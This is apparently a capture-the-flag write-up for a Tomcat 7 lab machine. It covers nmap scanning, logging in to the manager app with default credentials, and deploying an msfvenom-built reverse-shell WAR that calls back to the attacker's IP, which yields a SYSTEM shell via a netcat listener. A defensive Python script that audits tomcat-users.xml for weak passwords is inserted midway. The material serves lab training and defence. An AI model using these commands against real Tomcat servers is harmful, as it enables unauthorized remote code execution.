Jerry Writeup

Without Metasploit

Reconnaissance

Initial Nmap scan to find open ports, treating all hosts as online (-Pn) so the scan does not depend on a ping reply.

nmap -Pn 10.10.10.95

Detailed Nmap Scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying port 8080

  • (-oN nmap): Saving the output into a file called nmap

nmap -sC -sV -p 8080 -oN nmap 10.10.10.95

Let's visit the web server this machine hosts on port 8080.

Looking at the site and testing around tells us that Apache Tomcat/7.0.88 is running on it, and that we need a set of credentials to log in as manager to perform any other actions.

What we can do now is search Google for default credentials that might let us log in to the server. We can also see a username and a password on the error page we get when we try to access the manager app with wrong credentials.

Let's try logging in with these credentials.

And we are logged in! Looking at the application, we can see an option to upload and deploy WAR files. A WAR file can be generated with msfvenom, which gives us a way to try for a reverse shell on the server.
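From the defender's side, the two weaknesses this step relies on are a manager account with a guessable password and a privileged manager role attached to it. The following audit script is an added example, not part of the writeup; it parses a tomcat-users.xml file and flags accounts whose password is a well-known placeholder, equals the username, or is too short, and marks whether the account holds one of Tomcat's privileged manager/admin roles. The embedded XML, the weak-password list and the 12-character minimum are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Tomcat roles that grant control over the manager or host-manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed list: the placeholders Tomcat's own sample configuration and
# manager 401 page show, plus common guesses. Extend it from your own policy.
WEAK_PASSWORDS = {"", "tomcat", "s3cret", "admin", "password", "manager", "changeme"}

MIN_PASSWORD_LENGTH = 12  # assumed policy value for this example

# Constructed sample tomcat-users.xml, not any real host's file.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="viewer"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="Q7v!pL2m#Zr9wX4e" roles="manager-script"/>
  <user username="viewer" password="tomcat" roles="viewer"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace so Tomcat 7 (no namespace) and 8+ files parse alike."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of findings, one per user element with a weak password."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        username = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        reasons = []
        if password in WEAK_PASSWORDS:
            reasons.append("password is a well-known default or placeholder")
        elif password.lower() == username.lower():
            reasons.append("password equals username")
        elif len(password) < MIN_PASSWORD_LENGTH:
            reasons.append(f"password shorter than {MIN_PASSWORD_LENGTH} characters")
        if reasons:
            findings.append({
                "username": username,
                "privileged": bool(roles & PRIVILEGED_ROLES),
                "roles": sorted(roles),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        level = "HIGH" if f["privileged"] else "LOW"
        print(f"[{level}] {f['username']} ({', '.join(f['roles'])}): {'; '.join(f['reasons'])}")
```

Run against the sample, the tomcat account is reported as HIGH because a placeholder password sits on a manager-gui role, while the viewer account is reported as LOW; the deploy account is not reported. Pair this with restricting the manager app by source address (Tomcat's RemoteAddrValve) so that a guessed password alone is not enough.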

Exploitation

First we generate the msfvenom WAR file, calling it reverse.war. I'm using my machine's IP for LHOST (the listening host); replace it with your own IP in the command.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f war > reverse.war

Now let's upload the file.

After clicking Deploy, we can see that it has been added as a path under the Applications tab.

Clicking the link (/reverse) triggers the reverse shell, so before clicking it we first start a Netcat listener on our machine.

nc -lvnp 1234

Once we click the link, we get a reverse shell running as nt authority\system.
